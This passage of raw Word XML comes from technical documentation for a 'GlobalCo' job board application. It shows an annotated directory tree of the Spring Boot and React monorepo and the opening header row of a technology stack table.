        <w:t>7. Complete Project Structure &amp; Directory Rationale</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>The repository follows an enterprise Monorepo architecture with clean physical separation between backend and frontend:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing: GlobalCo Full-Stack Project Directory Architecture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9648"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9648"/>
            <w:shd w:fill="F1F5F9"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>GlobalCo-JobBoard/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>├── backend/                                   # Java 21 LTS + Spring Boot 3.2.3 Service</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│   ├── pom.xml                               # Maven Project Object Model (Dependencies &amp; Plugins)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│   ├── src/main/java/com/jobboard/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│   │   ├── JobBoardApplication.java          # Spring Boot Application Entry Point</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│   │   ├── config/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│   │   │   └── DataInitializer.java          # Database Seeder (CommandLineRunner)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│   │   ├── controller/                       # REST API Controllers (@RestController)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│   │   │   ├── AdminController.java          # Admin KPIs, user moderation, audit logs</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│   │   │   ├── AnalyticsController.java      # Recruiter metrics &amp; conversion rates</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│   │   │   ├── ApplicationController.java    # Job application submission &amp; lifecycle</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│   │   │   ├── AuthController.java           # Login, registration, token issuance</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│   │   │   ├── CandidateProfileController.java# Profile &amp; technical skills management</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│   │   │   ├── CategoryController.java       # Job category taxonomy</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│   │   │   ├── CompanyController.java        # Company profiles &amp; verification</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│   │   │   ├── InterviewController.java      # Technical interview scheduling &amp; feedback</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│   │   │   ├── JobController.java            # Job search, catalog, match breakdown</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│   │   │   ├── NotificationController.java   # Real-time candidate notification feed</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│   │   │   ├── OfferController.java          # Formal offer generation &amp; candidate response</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│   │   │   ├── RecruiterController.java      # Recruiter requisitions &amp; ATS pipeline</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│   │   │   ├── ResumeController.java         # Resume upload &amp; parsing simulation</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│   │   │   └── SavedJobController.java       # Bookmarking &amp; saved opportunities</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│   │   ├── dto/                              # Data Transfer Objects (Payload validation)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│   │   ├── entity/                           # JPA Relational Entities (@Entity, @Table)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│   │   ├── exception/                        # GlobalExceptionHandler (@ControllerAdvice)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│   │   ├── repository/                       # Spring Data JPA Data Access Interfaces</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│   │   ├── security/                         # SecurityConfig, JwtUtil, JwtAuthenticationFilter</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│   │   └── service/                          # Business Logic Services (@Service, @Transactional)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│   └── src/main/resources/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│       ├── application.properties            # Core H2, JPA, JWT, and server configuration</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│       └── application-prod.properties       # Production MySQL &amp; connection pool profile</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>├── frontend/                                  # React 18 + Vite 7 + Tailwind CSS Client</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│   ├── package.json                          # Node dependencies and build scripts</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│   ├── vite.config.js                        # Vite bundler configuration &amp; proxy rules</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│   ├── tailwind.config.js                    # Red &amp; White design system theme tokens</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│   ├── postcss.config.js                     # PostCSS autoprefixer pipeline</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│   └── src/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│       ├── main.jsx                          # React DOM Root initialization</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│       ├── App.jsx                           # Root component wrapping AuthProvider &amp; Toast</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│       ├── index.css                         # Global CSS styles, Tailwind directives, badges</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│       ├── contexts/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│       │   └── AuthContext.jsx               # Global Auth state, localStorage sync, login/logout</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│       ├── routes/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│       │   ├── AppRoutes.jsx                 # Route definitions (&lt;Routes&gt;, &lt;Route&gt;)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│       │   ├── RequireAuth.jsx               # Role-based Route Guard (&lt;Navigate to="/login"&gt;)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│       │   └── routeMap.js                   # Centralized application URI constants</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│       ├── services/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│       │   ├── api.js                        # Central Axios instance with Bearer interceptors</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│       │   ├── authApi.js                    # Auth HTTP requests (login, register)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│       │   ├── jobApi.js                     # Job catalog &amp; search HTTP requests</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│       │   ├── applicationApi.js             # Application submission &amp; tracking HTTP requests</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│       │   └── profileApi.js                 # Profile &amp; skills HTTP requests</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│       ├── pages/                            # Full-page views organized by persona</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│       │   ├── Candidate/                    # Dashboard, ApplicationTracker, SavedJobs</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│       │   ├── Recruiter/                    # HiringHub, ApplicantPipeline, PostJob</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│       │   ├── Admin/                        # AdminDashboard, UserManagement, AuditLogs</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│       │   ├── Auth/                         # LoginPage, RegisterPage</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│       │   ├── Jobs/                         # JobCatalogPage, JobDetailsPage</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│       │   └── Profile/                      # ProfilePage, SkillsManager</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>│       └── components/                       # Reusable UI widgets (Navbar, JobCard, Modal)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>├── doc_assets/                               # 17 High-resolution live application screenshots</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>└── docs/                                     # Architecture documentation, SQL schemas, API specs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>8. Technology Stack Deep Dive</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Every technology in GlobalCo was deliberately chosen to satisfy specific engineering requirements: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1440"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Technology</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Architectural Justification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
